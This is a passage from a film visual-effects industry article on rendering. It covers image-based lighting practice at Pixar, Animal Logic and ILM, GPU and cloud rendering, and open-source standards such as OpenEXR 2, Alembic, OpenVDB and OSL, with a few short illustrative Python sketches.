    To handle MU, the team at Pixar created some new tools, such as a tool to paint on a lighting dome. "So not only could you shoot IBLs that were physical to start with, but if you wanted to you could enhance it, or come back with something with more kick on it, you could use 'Splats'." This tool allows interactive feedback while painting on the IBL dome and seeing the output: an oriented, interactive, fast IBL paint system for the lighters, to not only vary real maps but create IBLs from scratch. "It was an artistic way of creating IBLs," Hery explains, "after all, at Pixar all the shots we were creating were all synthetic – there was no 'plate' photography." Initially, Hery shot real IBLs just to help with look development. "I was not expecting to use IBL at all during shot production, but they liked it so much (the TDs) that they asked us to create this interface where they could artistically paint and have this arbitrary input to the texture/process but have feedback on it," he explains. "They were literally in some cases starting from scratch, starting from the black texture, and artistically painting: this is where I want this diffuse luminosity here, I want a higher more intense source of light." At times the team took complete liberty in shot lighting and what it means to use an IBL, using tools built for matching to live action simply to paint with light and illuminate the inhabitants of MU. Of course the IBL would work in conjunction with what was in the scene: the IBL would inform the lighting, but any character would still be lit by bounce off whatever they were standing on, just as they would be if the IBL were a real photographic HDR reference image. The actual painting was not a flattening of the dome to a rectangle but rather a regionalized surround that understood color and exposure and then created an image, with near real time feedback.

    Each of the lights in the scene could also be textured; each light had a profile and a cosine power to shape the angular emission of the light, plus 'barn doors' or slight projections. The barn doors on the Pixar MU lights allowed even more barn door control than is possible in the real world, "but we tried to not break physics on the way," says Hery. "We always tried to work in a way that could preserve some of the things from before that they wanted (in terms of interaction and UI), but we did not necessarily have to encode them in such a way that would jeopardize the whole system." The R&D team found new analogies and new ways to present familiar tools in a physically plausible way. "That worked really well and they were very happy."

    1.3.2 The Great Gatsby experience

    Animal Logic on The Great Gatsby (2013) produced their own unique pipeline that involved their own code and RenderMan. We spoke to Matt Estela, the lighting lead from Animal Logic, Australia’s premier film, animation and visual effects studio.

    For Gatsby the team used Animal’s own pipeline with a path tracer within PRman. AL worked with RenderMan as they had many tools from a long history with the product, an experience other facilities have also echoed. Estela joked at a recent Autodesk event that their job was to “Make it look real, Make it look cool and Make it render on time.”

    A common solution, especially for exteriors, started with a combination of an environment light and a key light. Estela explains that the environment light provides realism, soft shadows and overall tonality, but it is also the most expensive light to use. "It is a bit like a dome light in Mental Ray," he adds.


    Final render and comp by Animal Logic (The Great Gatsby).

    The use of this approach produced great results but it did not come without some effort. The two key problems were render times (to get renders with satisfactorily low noise) and memory use. "Our old system could render using 8 gig, our new system used 64 gigs of RAM, and we could easily put 'em into swap." Still, the team very successfully migrated to the new approach of physical shaders and lighting, and used IBL to both technical and artistic success.

    Fresh from working on The Great Gatsby, Estela walked fxguide through a worked example of how he creatively lights with an IBL using a test set-up.


     

    Figure 1:

    On the left is a simple test scene with 2 cats, and a robot. It has soft shapes and hard edged geometry.

    On the extreme left there is a chrome sphere at the top, and a diffuse sphere beneath it, for context. At this stage the scene is lit with a single distant light simulating the sun. It has shadows, but it is missing fill light.



    Figure 2:

    If we relight with just, effectively, a large white environment light (a white dome/IBL ball), the image becomes effectively an ambient occlusion pass.

    Note: the single distant light from Figure 1 is off.


    Figure 3:

    The scene is now lit with an example HDRI mapped into the env light (the photo in the middle is that HDR mapped onto a plane, as a preview, so you can see what it looks like). This is more realistic but not production quality.

    Note: the shadows are coming from the ‘sun’ in the HDR. The environment light is the only light source in this image.


    Figure 4:

    The env light is now edited. Note the brown ground has been painted out: the correct ground bounce light should come from what the figures are standing on. If you compare the last two images you can see some warm bounce on the back of the robot's leg (we need to remove that).

    Note: this may not be needed in practice if the env light was just a 180 dome, or the ground plane 3D element they are standing on blocked that light, but here we are painting on the HDR to illustrate the point.


     

    Figure 5:

    The sun is now painted out of the HDR. Unless the HDR is very carefully captured, there will be some clipping of the real sun in the HDR, and some renderers can't handle that amount of dynamic range in an HDRI without creating noise or fireflies (or black dots). Creatively it is also good to be able to move the sun without rotating the env light.

    We now have a basic map to start working with.



    Figure 6:

    Sometimes a temp colour map is used to better understand which are the interesting areas of the HDR. Green is the area around the sun (imagine the hazy light that extends around the sun on an average sunny day; it's usually much, MUCH wider than the sun itself), blue represents the sky low to the horizon, a darker blue at the back of the map marks the region facing away from the sun, red marks the broader overhead region, and yellow the small area directly overhead. This helps the TD or lighter understand what they are working with.



    Figure 7:

    In dailies during production, the issue of 'shape' plus warm vs cool often comes up in the context of finding nice modelling detail in the assets and wanting to enhance it, or of avoiding the 'hero' looking 'flat'. Color is used to give a sense of separation: shapes that face the sun here have warmer tones, while the parts facing away have cooler tones. Here the green zone from the previous image has been converted into a soft sun area, and that area of the map tinted to a warmer yellow. This gives the warm/cool separation often desired, and a more interesting shape.


     

    Figure 8:

    Here I've used the blue and red zones (blue being sky near the horizon, red being the sky region a bit higher), and set my sky colour to a more desaturated blue. A clear blue sky IS blue, but you rarely perceive gray objects as blue in real life: your eyes naturally white balance to remove the blue cast, and cameras will normally be adjusted to do the same. In a CG lighting context, you'd be looking at neutral objects in the live action plate (or a gray ball that's been shot on location, if you're lucky), and making sure your environment light tints your CG objects to match. I've also used the region that faces away from the sun and exposed it down. Comparing to the previous image, it has the effect of slightly darkening shapes away from the sun, giving a little more shape again.



    Figure 9:

    Here’s a trick from Etienne Marc, one of the senior lighters on Great Gatsby at Animal Logic. Here we have added a thin, high intensity stripe of white across the top of the HDR. This adds a little more top light across the top of objects, but more usefully, sharpens their contact shadows, making everything feel a little more grounded. If you click on the image and toggle between this and the previous slide, you can see how the ground contact shadows are more defined. “‘The CG feels like it’s floating’ is a regular comment in lighting reviews, this helps avoid it.”


     

    Figure 10:

    Finally the key light is turned back on and balanced against the environment light. The shading is now much more interesting, but still grounded in realism. There is a solid base for a key light now; with more indirect/bounce light from other objects and final materials, this is well on the way to a nice looking shot.


    Below is a before and after reel from The Great Gatsby, showing the great work of Animal Logic (primary vendor) in producing realistic and stylized lighting. The other VFX houses involved on the film were Rising Sun Pictures, Iloura, ILM, Prime Focus and Method Vancouver. The overall supervisor was Chris Godfrey.


    src="http://player.vimeo.com/video/68451324?title=0&byline=0&portrait=0&color=f24f46" height="360" width="640" allowfullscreen="" frameborder="0" style="margin: 0px; padding: 0px; border-width: 0px; font-weight: inherit; font-style: inherit; font-size: 14.3999996185303px; font-family: inherit; vertical-align: baseline;">


    1.3.3. The ILM Experience

    As mentioned above, ILM’s early work moved beyond just energy conservation. Their work with IBL also broke new ground and allowed Tony Stark’s Iron Man to look incredibly real.

    We again spoke with ILM visual effects supervisor Ben Snow, who is currently working on Noah for Black Swan director Darren Aronofsky. (source: IMDBPro).

    Outside:

    “I am working on a show now with a lot of exteriors and using IBL does help you get just a great first take,” says Snow, but the four time Oscar nominee also points out that, “you then of course have to go in and look at it like a DP.”

    While the IBL on exteriors will match with the dome or environment light at infinity, Snow goes on to say that "if I am out there shooting with a DP, with an actor, and they have the sun and they orientate the actor to the sun, they also can add a bounce card or a scrim or a silk to mute the sun, and I don't know we are fully there yet with that technology, but that's where I want to be – I want to have the equivalent of what they have out there." A DOP will normally light any character, even on a seemingly simple wide open exterior shot, controlling contrast ratios and top light with the bounce cards and silks Snow refers to.

    Inside:

    To that end Snow also pioneered, with films like Iron Man 2, not only having the IBL with its lights effectively at infinity, but cutting the lights out of the IBL and placing them correctly in the scene. "I do like the flexibility of isolating the lights from that fixed environment and put them on sources a bit closer." The lights are then painted out of the IBL dome or sphere. This is significantly different from painting the dome as in the examples above: with Snow's and ILM's approach the light level remains the same, but the HDR light is no longer sitting on the dome – it is on a card in the room.


    In the IBL cases above we have been referring to the use of IBL primarily for external, open environment lighting, but it is very important to understand the move pioneered by ILM in removing or cutting lights from the 'infinite' distant dome and, for interior scenes, placing those HDR lights on cards in the physical space of the real world dimensions of, say, a 3D room. "If everything is at an infinite distance your character is not going to move through the scene, it's not going to move through the lights," Snow points out.
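
    A small, hypothetical sketch of why this matters: light from an 'infinite' dome direction stays the same wherever the character stands, while a light placed on a card at a real position brightens and dims as the character walks past it:

```python
import math

def dome_light(intensity):
    # Dome/environment light at infinity: the same everywhere in the room.
    return intensity

def card_light(intensity, card_position, character_position):
    # Localized HDR card: falls off with distance as the character moves through the set.
    distance = math.dist(card_position, character_position)
    return intensity / max(distance ** 2, 1e-6)

if __name__ == "__main__":
    card = (4.0, 2.0)  # a bright window card part way along the set
    for x in range(0, 9, 2):
        pos = (float(x), 0.0)
        print(f"x={x}: dome {dome_light(1.0):.2f}, card {card_light(20.0, card, pos):.2f}")
    # The dome value never changes; the card light peaks as the character passes it.
```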

    HDR from the set of Iron Man 2: ILM

    The Iron Man 2 pipeline was a key point in translating these concepts into a more image based lighting system.

    With Iron Man 2 the ILM team was recording HDRs much more accurately on set, and at multiple points on the set. This led to combining several technologies and the work of several departments to produce HDR IBL environments built from multiple HDRs.

    Created from three separate 360 HDRs: ILM

    Right is a working layout of the Iron Man set, with multiple HDRs and internally separated, correctly positioned lights.

    As well as introducing additional lighting elements, the HDR lights produce energy conserving proximity lighting for any digital characters.

    ILM’s work in this area has since advanced even further and the techniques have been widely adopted by others in the industry.


    1.4 Interactivity

    In addition to the problem of final rendering, there has been a lot of focus on producing a more interactive experience for artists, providing more of a final preview that, in many cases, if left to run will converge to the same final quality as the primary renderer.

    There are many scan line and hybrid render approaches to fast rendering. In the area of ray tracing most companies opt for a fast path tracing solution. This is in part due to render speed and part due to human perception. The way the image forms with path tracing – while still noisy – appears to be more readable and pleasant to artists, allowing them for the same render budget (or time) to see better what the final result will look like.

    This compares with traditional distributed ray tracing, which has been popular since the 80s. With path tracing fewer branches are spawned by sub-division, and so the information arrives visually to the artist more in point form. This difference between blocky and noisy allows a quicker read of the final image for many artists, regardless of path tracing's speed in pure isolated terms.

    Below is an example of re-rendering in RenderMan comparing distributed ray tracing with the newer path tracer by Christos Obretenov (LollipopShaders and fxphd.com Prof.) for fxguide. The absolute times should not be taken as any render test, they are just recorded to show how each version looked at the same point in time.

    Click for very large version (2k) to see the detail.

    While the image starts to become recognizable after only a few samples per pixel (perhaps 100), for the image to "converge" and reduce noise to acceptable levels usually takes around 5,000 samples for most images, and many more for pathological cases.
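
    A hedged sketch of what such progressive re-rendering loops do conceptually (illustrative only, with a stand-in for actual path tracing): keep accumulating samples into a running average and show the artist the current estimate after every pass, so the image refines in place rather than appearing only at the end:

```python
import random

def take_sample():
    # Stand-in for tracing one camera path for a pixel: a noisy sample
    # whose expected value is the "true" pixel value of 0.5.
    return random.gauss(0.5, 0.3)

def progressive_render(passes, report_every=1000):
    accumulated, count = 0.0, 0
    for _ in range(passes):
        accumulated += take_sample()
        count += 1
        if count % report_every == 0:
            # The artist watches this running average refine instead of waiting.
            print(f"{count:5d} spp -> current estimate {accumulated / count:.3f}")
    return accumulated / count

if __name__ == "__main__":
    random.seed(7)
    progressive_render(5000)
```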


    1.5 GPU

    GPU rendering is a huge topic. Previously, while GPUs were seen as good for some things, such as pre-render passes as in the case of Weta Digital's PantaRay and its use of spherical harmonics (see our fxguide story on Weta's impressive PantaRay), they were not seen as a viable option for production rendering. This has changed, and now not only are there GPU options at the workstation level, such as Octane by Otoy, but also cloud based rendering on GPUs with Nvidia and Octane, and complete remote rendering options that remove any workstation rendering heavy lifting, such as Lagoa.


    A still from Avatar by Weta Digital (Panta Ray). © 2009 Twentieth Century Fox Film Corporation. All rights reserved.

    One issue in the GPU world is the split between CUDA (Nvidia only) and the open source but perhaps less popular OpenCL environments. The rendering sector is no different, mirroring the divide in the larger GPU community.

    Next Limit, for example, is following the CUDA/OpenCL situation, and would certainly consider exploring new platforms like the GPU down the road if the landscape stabilized. "We are paying a lot of attention to how it is evolving and eventually we will expand Maxwell, if it doesn't mean sacrificing quality or functionality," says Next Limit's Juan Cañada.

    Regardless, the trend towards more and more GPU experimentation is firmly established. While the major renderers require CPUs, the move to mobile computing is fanning the need to render faster, and the limits of GPU rendering keep retreating. A few years ago GPU renders looked 'game like' and were easy to spot compared to production renders. That might still be true in some realtime applications, especially for SSS and complex characters, but the gap has shrunk dramatically, and for many non-realtime applications it is virtually impossible to pick GPU from CPU for certain types of shots.

    Programming GPUs remains somewhat challenging as code can sometimes need to be very specific to individual hardware revisions, and memory limitations for production renderers can be a real issue. In addition, not all algorithms are GPU friendly meaning that not all problems are suited to the architecture of a GPU.

    The economies of scale in mobile computing and real time gaming are driving forward the technology constantly. One of the most impressive displays of the state of the art of GPU rendering will be at the annual RealTime Live SIGGRAPH presentation next week in Anaheim. An international jury has selected submissions from a diverse array of industries to create a fast-paced, 45-minute show of aesthetically stimulating real-time work.



    1.6 Farm and cloud rendering


    Rendered with Otoy’s octane

    As one can see in part 2 of the State of Rendering (the individual product renderer section), some new renderers are completely cloud based, having left behind any notion of local rendering (see Lagoa), while others offer both local and farm rendering (see Octane/Otoy). For most renderers there is a desire to work with third party companies to allow rendering in the cloud. The only exception was Lightwave's (NewTek's) Rob Powers who, while not against it, surprisingly questioned its economic value in an age of cheap PCs and low cost render licenses. For everyone else the logic is manifold:

    • companies – especially smaller to medium size companies want to be able to ramp up and down quickly. Workloads are lumpy and why maintain a farm when it only rarely needs to be pushed to capacity?
    • renderfarms require physical space, serious air conditioning, consume large amounts of power (use and air con) and thus are expensive to run, no matter how cheap the machines
    • Amazon and other services have provided a vast cloud computing environment at low cost per hour
    • security issues have been addressed so clients are not as worried about leaks
    • internet speeds are allowing meaningful connections for large scenes
    • margins are tight and reducing capital expenditure and making it job based is good business practice

    Lagoa UI – Cloud rendering and cloud based


    Rendered via ZYNC. Courtesy of ZERO VFX.

    Specialist companies like ZYNC and Green Button have sprung up to service our industry with a real understanding of security issues and comprehensive licensing solutions (see our ZYNC story here). For example, both ZYNC and Green Button now support V-Ray, and Chaos Group has a special cloud renderer for anyone else looking to set up cloud rendering; in fact the company points out it could be cloud enabled. "It's really pretty interesting!" comments Lon Grohs, business development manager, Chaos Group.

    Companies like Chaos Group/V-Ray, Pixar/RenderMan and The Foundry (with Nuke) have been quick to support these cloud farm solutions. In turn, companies like Zero VFX are using them very successfully, and Atomic Fiction has completely avoided in-house render farms – their entire equipment room is a wall plug to the internet.


    1.7 Open source

    OpenVDB, Alembic, OpenEXR 2, Open Shading Language (OSL), Cortex and other open source initiatives have really taken off in the last few years. For some companies this is a great opportunity; a few others are considering them but have higher priorities; no one is ignoring them.


    A scene from The Croods using OpenVDB.

    With online communities and tools such as GitHub, people around the world have worked together to move in-house projects and standardizations into the public open source community. While most of this is based on genuine community motivation, the growth of patent trolls and the costs of isolated development have also contributed.


    The Foundry’s Jack Greasley demoing Mari recently

    Companies such as The Foundry, who excel at commercializing in-house projects into mainstream products such as Nuke, Katana, Mari and now FLIX, have also been key in adopting and helping to ratify standards such as OpenColorIO, Alembic and OpenEXR 2. This partnership between the vendors and the big facilities has huge advantages for the smaller players as well. Several smaller render companies expressed complete support for such open standards, one might even say exuberance: they feel they cannot compete with the big companies, but when open standards are adopted it allows a smaller player to correctly and neatly fit into bigger production pipelines. In reference to open source in general, Juan Cañada, the Head of Maxwell Render Technology, commented: "This is something we have been praying for. We are not Autodesk, we are not even The Foundry. We are smaller, and we never force people to use just our file formats, or a proprietary approach to anything, so anything that is close to a standard is a blessing for us. As soon as Alembic came along we supported that, the same with OpenVDB, OpenEXR etc. For a medium sized company like us, it is super important that people follow standards, and from the user's point of view we understand this is even more important. It is critical. We have committed ourselves to follow standards as much as possible."

    Below are some of the key open source initiatives relevant to rendering that we have not included in our round-up of the main players (see part 2) but will cover from SIGGRAPH, along with others excluded due to current levels of adoption, such as OpenRL (from Caustic, an Imagination Technologies company), which as we understand is currently supported only by Brazil, but aims to provide low level abstraction for ray tracing on both GPU and CPU.

    1.7.1. OpenEXR 2 (major support from ILM)

    The most powerful and valuable open source standard that has impacted rendering would have to be the OpenEXR and OpenEXR 2 file formats. Really containers of data, the format has exploded as the floating point file format of choice, and in recent times has expanded further to cover stereo and the storing of deep color or deep compositing data. The near universal acceptance of OpenEXR as the floating point big brother of the DPX/Cineon file format/data container has been a lighthouse of inspiration that has fathered much of the open source community in our field. But more than that, it has been central to the collaborative workflow that allows facilities all over the world to work together. Steered and supported by ILM and added to by Weta Digital, arguably two of the most important visual effects facilities in the world, the standard has been successful and has been expanded to keep it relevant.

    OpenEXR 2.0 was recently released with major work from Weta and ILM. It contains:

    • Deep Data support – Pixels can now store a variable-length list of samples. The main rationale behind deep images is to enable the storage of multiple values at different depths for each pixel. OpenEXR 2.0 supports both hard-surface and volumetric representations for deep compositing and deep color workflows.
    • Multi-part Image Files  (including Stereo support) – With OpenEXR 2.0, files can now contain a number of separate, but related, data parts in one file. Access to any part is independent of the others, pixels from parts that are not required in the current operation don’t need to be accessed, resulting in quicker read times when accessing only a subset of channels. The multipart interface also incorporates support for Stereo images where views are stored in separate parts. This makes stereo OpenEXR 2.0 files significantly faster to work with than the previous multiview support in OpenEXR.
    • Optimized pixel reading – decoding RGB(A) scanline images has been accelerated on SSE processors providing a significant speedup when reading both old and new format images, including multipart and multiview files.

    Although OpenEXR 2.0 is a major version update, files created by the new library that don’t exercise the new feature set are completely backwards compatible with previous versions of the library.
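
    To illustrate the deep data idea (a conceptual Python sketch only, not the OpenEXR API), each pixel stores a variable-length list of samples, each with a depth, so a compositor can merge hard surfaces and volumes correctly per pixel before flattening:

```python
from dataclasses import dataclass, field

@dataclass
class DeepSample:
    depth: float      # distance from camera
    color: float      # simplified here to a single channel
    alpha: float      # coverage/opacity of this sample

@dataclass
class DeepPixel:
    samples: list = field(default_factory=list)  # variable length, unlike a flat image

    def add(self, depth, color, alpha):
        self.samples.append(DeepSample(depth, color, alpha))

    def flatten(self):
        # Composite front-to-back with the classic "over" operation.
        out_color, out_alpha = 0.0, 0.0
        for s in sorted(self.samples, key=lambda s: s.depth):
            out_color += (1.0 - out_alpha) * s.color * s.alpha
            out_alpha += (1.0 - out_alpha) * s.alpha
        return out_color, out_alpha

if __name__ == "__main__":
    pixel = DeepPixel()
    pixel.add(depth=2.0, color=1.0, alpha=0.3)   # wisp of volume in front
    pixel.add(depth=10.0, color=0.2, alpha=1.0)  # hard surface behind it
    print("flattened pixel:", pixel.flatten())
```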


    Weta Digital uses deep compositing with RenderMan: Man of Steel (2013).

    RenderMan from Pixar fully supports deep color, and Pixar has worked very successfully with Weta Digital, who use deep color on most if not all productions, including the complex work for the battle on Krypton in Man of Steel.

    Arnold does not support deep color / deep data compositing 'out of the box', but for select clients such as ILM they have developed special pipelines for shows such as Pacific Rim. It is Solid Angle's intention to implement this more widely in a future version of Arnold. Next Limit has already implemented deep data in Maxwell Render; it is currently in beta and will hopefully ship with the new Release 3.0 around October (along with Alembic, OpenEXR 2.0 etc. – Next Limit is committed to open source generally).

    Side Effects Software's Houdini is another open source supporter. "We are really excited about all the open source stuff that is coming out, especially Alembic, OpenVDB and OpenEXR 2, and the fact that deep image support is there in OpenEXR 2.0 makes it really great for compositing volumes and the other things Houdini is so good at," explains Mark Elendt, senior mathematician and very senior Side Effects team member, talking about Houdini's forthcoming full support of OpenEXR 2.0. Deep compositing was driven by Weta, ILM and also The Foundry for Nuke compositing. But Nuke is scanline based and Side Effects is tile based, so there was a whole section of the spec and implementation that was somewhat untested. Side Effects worked very closely with the OpenEXR group to make sure the deep compositing workflow worked well with Houdini and other tiled solutions.

    1.7.2. Alembic (major support from SPI/ILM)

    Alembic has swept through the industry as one of the great success stories of open source. The baked-out geometry it stores reduces complexity and file size while passing on a powerful but simplified version of an animation or performance, all in an agreed, standardized file format. It has been welcomed in almost every section of the rendering community. It allows for better file exchange between facilities, and better integration and faster operation inside facilities. Since its launch at SIGGRAPH 2010 and its public release at SIGGRAPH 2011 (see our coverage and video from the event), both facilities and equipment manufacturers have embraced it.

    Alembic is:

    1. fast 
    2. efficient
    3. reliable

    Alembic reduces data replication, and this feature alone gave a 48% disc usage reduction on Men in Black 3 (an Imageworks show). ILM first adopted it studio-wide in the pipeline refresh it undertook while gearing up for the original Avengers, and has used it ever since. And it is easy to see why: SPI saw files on some productions drop from 87 gig to 173MB.
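
    A conceptual sketch (not Alembic's actual implementation) of why baked caches can shrink so much: if a sample of vertex positions is identical to one already stored, say a prop that never deforms, the cache can reference the earlier sample instead of repeating the data for every frame:

```python
import hashlib

def bake_animation(frames):
    # frames: list of tuples of vertex positions, one tuple per frame.
    stored_samples = {}   # hash -> sample data, written only once
    frame_index = []      # per-frame reference into stored_samples
    for positions in frames:
        key = hashlib.sha1(repr(positions).encode()).hexdigest()
        if key not in stored_samples:
            stored_samples[key] = positions   # only genuinely new data is stored
        frame_index.append(key)
    return stored_samples, frame_index

if __name__ == "__main__":
    static_prop = (0.0, 1.0, 2.0)
    frames = [static_prop] * 240                  # a prop that never moves for 240 frames
    samples, index = bake_animation(frames)
    print(f"{len(index)} frames reference {len(samples)} stored sample(s)")
```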

    Alembic was helmed by a joint effort from ILM and Sony, spearheaded by Tony Burnette and Rob Bredow, the two companies' respective CTOs. Together they put forward a killer production solution with a strong code base contributed to by many other studios and by commercial partners such as Pixar, The Foundry, Solid Angle, Autodesk and others, with product implementations in Maya, Houdini, RenderMan, Arnold and Katana all joining from the outset. Since then most other renderers have moved to support Alembic; not all, but most major packages now support it.

    Alembic 1.5 will be released at SIGGRAPH 2013 with new support for multi-threading. This new version includes support for the Ogawa libraries. The new approach means significant improvements; unofficially:

    1) File sizes are on av. 5-15% smaller. Scenes with many small objects should see even greater reductions
    2) Single-threaded reads average around 4x faster
    3) Multi-threaded reads can improve by 25x  (on 8 core systems)

    Key developers seem pretty enthusiastic about it. Commenting on the next release, Mark Elendt from Side Effects says “it uses their Ogawa libraries, which is a huge efficiency over the HDF5 implementation that they had.”

    The new system will maintain backwards compatibility. The official details should be published at SIGGRAPH 2013. Also being shown at SIGGRAPH is V-Ray's support for Alembic, which is already in alpha or beta testing. Already, for key customers, "on our nightly builds we have Alembic support and OpenEXR 2 support," commented Lon Grohs, business development manager of Chaos Group.

    1.7.3. OpenVDB (major support from Dreamworks Animation)

    OpenVDB is an open source (C++ library) standard for a new hierarchical data structure, plus a suite of tools, for the efficient storage and manipulation of sparse volumetric data discretized on three-dimensional grids. In other words, it helps with volume rendering by being a better way to store and access volumetric data. It comes with some great features, not the least of which is that it allows for an effectively infinite volume, something hard to store normally.


    A scene from DreamWorks Animation’s Puss in Boots.

    It was developed and is supported by DreamWorks Animation, who use it in their volumetric applications in feature film production.

    OpenVDB was developed by Ken Museth at DreamWorks Animation. He points out that dense volumes can carry a huge memory overhead and are slow to traverse when ray tracing. To solve this, people turned to sparse data storage: one only stores exactly what one needs, but then the problem is finding data in this new data structure.

    There are two main methods commonly used in ray tracing now. The first is an octree (brick maps in RenderMan, for example, use this effectively for surfaces). While this is a common solution, with volumes these trees can get very "tall", meaning it is a long way from the root of the data to the leaf; a long data traversal equals slow ray tracing, especially for random access. The second is a tiled grid approach. This is much "flatter", with just the root and immediately the leaf data, but it does not scale, as it becomes a very wide table. OpenVDB balances these two methods by producing a fast data traversal, rarely requiring more than 4 levels, that is also scalable. This is needed as a volumetric data set can easily be tens of thousands of voxels across or more. While this idea of employing a shallow, wide tree, a so-called B+ tree, has been used in databases such as Oracle and file systems (i.e. NTFS), OpenVDB is the first to apply it to the problem of compact and fast volumes.
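
    A toy Python sketch of the sparse idea (nothing like OpenVDB's actual B+ tree, just the principle): store only the tiles that contain values and return a background value everywhere else, so the volume is effectively unbounded while using almost no memory:

```python
TILE = 8  # tile edge length in voxels

class SparseVolume:
    def __init__(self, background=0.0):
        self.background = background
        self.tiles = {}  # tile coordinate -> dict of voxel values, allocated on demand

    def _split(self, x, y, z):
        return (x // TILE, y // TILE, z // TILE), (x % TILE, y % TILE, z % TILE)

    def set(self, x, y, z, value):
        tile_key, local = self._split(x, y, z)
        self.tiles.setdefault(tile_key, {})[local] = value

    def get(self, x, y, z):
        tile_key, local = self._split(x, y, z)
        return self.tiles.get(tile_key, {}).get(local, self.background)

if __name__ == "__main__":
    smoke = SparseVolume()
    smoke.set(1_000_000, 42, -7, 0.8)         # coordinates far from the origin are fine
    print(smoke.get(1_000_000, 42, -7))       # 0.8
    print(smoke.get(0, 0, 0))                 # background value, no memory used there
    print("tiles allocated:", len(smoke.tiles))
```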


    Puss in Boots cloud environment.

    On top of this OpenVDB provides a range of tools to work with the data structure.

    The result of implementing OpenVDB is:

    1. Very fast access/processing
    2. Very small memory footprint

    Just how small? The memory footprint of one DreamWorks Animation model dropped from half a terabyte to less than a few hundred megabytes. And a fluid simulation skinning (polygonization) operation that took an earlier Houdini version some 30 minutes per section (and it had to be split into bins for memory reasons) "with OpenVDB could all be done in around 10 seconds," says Museth.

    An additional advantage is that the volume can be dynamic (vs static), which lends itself very well to fluids, smoke etc.

    (Click here for Museth’s SIGGRAPH 2013 paper)

    OpenVDB has seen rapid adoption, most noticeably by Side Effects Software, who were the first to publicly back the initiative, and additionally by Solid Angle (Arnold) and Pixar (RenderMan).

    “The ease of integration was a huge factor in enabling us to introduce OpenVDB support,” says Chris Ford, RenderMan Business Director at Pixar Animation Studios. “The API is well thought out and enabled us to support the rendering requirements we think our customers need. The performance from threading and compact memory footprint is icing on the cake.”

    “In addition to our Arnold core and Houdini-to-Arnold support of OpenVDB, we’re also pleased to announce planned support in Maya-to-Arnold and Softimage-to-Arnold package plugins,” said Marcos Fajardo, Solid Angle.

    The use of DreamWorks Animation’s OpenVDB in Houdini was a key component in producing the many environmental effects in DreamWorks Animation’s movie The Croods. “The complexity of our clouds, explosions, and other volumetric effects could not have been done without the VDB tools in Houdini,” said Matt Baer, Head of Effects for The Croods.

    “The response to OpenVDB is overwhelmingly positive,” said Lincoln Wallen, CTO at DreamWorks Animation. “Feedback from our partners and the community has helped the team refine the toolset and create a robust release that is poised to set an industry standard.”

    OpenVDB uses a very efficient narrow-band sparse data format. “This means that OpenVDB volumes have an extremely efficient in-memory data structure that lets them represent unbounded volumes. The fact that the volumes are unbounded is really key. If you think of volumes as 3D texture maps, unbounded volumes are like having a texture map that can have infinite resolution,” explained Mark Elendt from Side Effects Software.

    Side Effects found it fairly easy to integrate OpenVDB into their existing modeling and rendering pipelines. “When we plugged VDB into Mantra’s existing volumetric architecture we could immediately use all the shading and rendering techniques that had been built around traditional volumes, such as volumetric area lights. Thanks to OpenVDB’s efficient data structures we can now model and render much higher fidelity volumes than ever before,” he said.

    For more information click here.

    1.7.4. OSL – Open Shading Language (major support from SPI)

    At last year’s SIGGRAPH, in a special interest group meeting of the kind SIGGRAPH calls a “Birds of a Feather” session, this one around Alembic, Rob Bredow, CTO of SPI, asked the packed meeting room how many people used Alembic. A vast array of hands shot up, which, given SPI’s steering role, clearly pleased Bredow. The response to the same question on OSL was not nearly as strong. At the time Sony Pictures Imageworks used OSL internally, and at the show Bill Collis committed The Foundry to exploring it with Katana, but there was no widespread groundswell like the one around Alembic.

    Run the clock forward a year and the situation has changed, or is about to change, fairly dramatically. Key renderer V-Ray has announced OSL support. “OSL support is already ready and in the nightly builds, and should be announced with version 3.0,” says Chaos Group’s Grohs. “We have found artists tend to gravitate to open source and we get demands which we try and support.”

    So have Autodesk’s Beast (a game asset renderer, formerly the Turtle renderer) and Blender, and there is more on the way. While it is not a slam dunk, OSL is within striking distance of a tipping point that could see its wide scale adoption, which in turn would be thanks to people like Bredow, a real champion of open source and one of the most influential CTOs in the world in this respect.

    “OSL has been a real success for us so far,” says Bredow. “With the delivery of MIB3 and The Amazing Spider-Man, and now Smurfs 2 and Cloudy with a Chance of Meatballs 2 on their way, OSL is now a production-proven shading system. Not only are the OSL shaders much faster to write, they actually execute significantly faster than our old hand-coded C and C++ shaders. Our shader writers are now focused on innovation and real production challenges, rather than spending a lot of time chasing compiler configurations!” Bredow explained to fxguide from location in Africa last week.

    OSL usage and adoption is growing, and importantly for any open source project it is moving from the primary supporter doing all the work to being a community project. “We’re getting great contributions back from the developer community now as well,” Bredow says.

    OSL does not have an open runway ahead, however. Some believe OSL is not wanted by their customers. “I have been to many film studios post merger, I’ve talked to a lot of customers and in the last 3 months I have done nothing but travel and visit people, and not once has it come up,” explained Modo’s Brad Peebler. While The Foundry and Luxology very much support open source, they seem to have no interest in OSL.

    Other groups are exploring something similar to OSL but different. Some companies are considering Material Definition Language (MDL), a somewhat different approach to shaders being developed by Nvidia with iRay, as explained by Autodesk’s rendering expert Håkan “Zap” Andersson. Zap, as he likes to be known, feels that OSL in general is a more modern and intelligent way to approach shading than traditional shaders, but Nvidia is moving in a different direction again.

    “If you look at OSL there is no such thing as a light loop, no such thing as tracing rays; you basically tell the renderer how much of ‘what kind of shading goes where’,” says Zap. “At the end of your shader there is not a bunch of code that loops through your lights or sends a bunch of rays… at the end, instead of returning a color like a traditional shader does, OSL returns something called a closure, which is really just a list of shading that needs to be done at this point. It hands this to the renderer and the renderer makes intelligent decisions about it.” This is a pattern of moving smarts from the shaders into the renderer. By contrast, Nvidia’s MDL is more a way of passing iRay a description of materials.
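
    A hedged, language-agnostic sketch of that closure idea (written in Python purely for illustration, not actual OSL): the “shader” returns a weighted list of BSDF lobes rather than a final color, and the renderer decides how to sample and integrate them:

```python
def skin_shader(base_color, sheen_amount):
    # Instead of looping over lights and returning a color, return a "closure":
    # a weighted list of named BSDF lobes the renderer knows how to sample.
    return [
        ("diffuse", 1.0 - sheen_amount, {"color": base_color}),
        ("microfacet_ggx", sheen_amount, {"roughness": 0.3}),
    ]

def renderer_integrate(closure):
    # The renderer, not the shader, decides what to do with each lobe:
    # importance sample it, split rays, or evaluate it against chosen lights.
    for lobe_name, weight, params in closure:
        print(f"renderer handles lobe '{lobe_name}' with weight {weight} and {params}")

if __name__ == "__main__":
    renderer_integrate(skin_shader(base_color=(0.8, 0.6, 0.5), sheen_amount=0.2))
```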

    “MDL is not a shading language as we would think of it, but rather a notation for iRay for describing materials: basically weighting BRDFs and setting their parameters,” says Bredow. “Since iRay doesn’t allow for programmable shaders the way we expect, it’s not really trying to solve the same problem.”

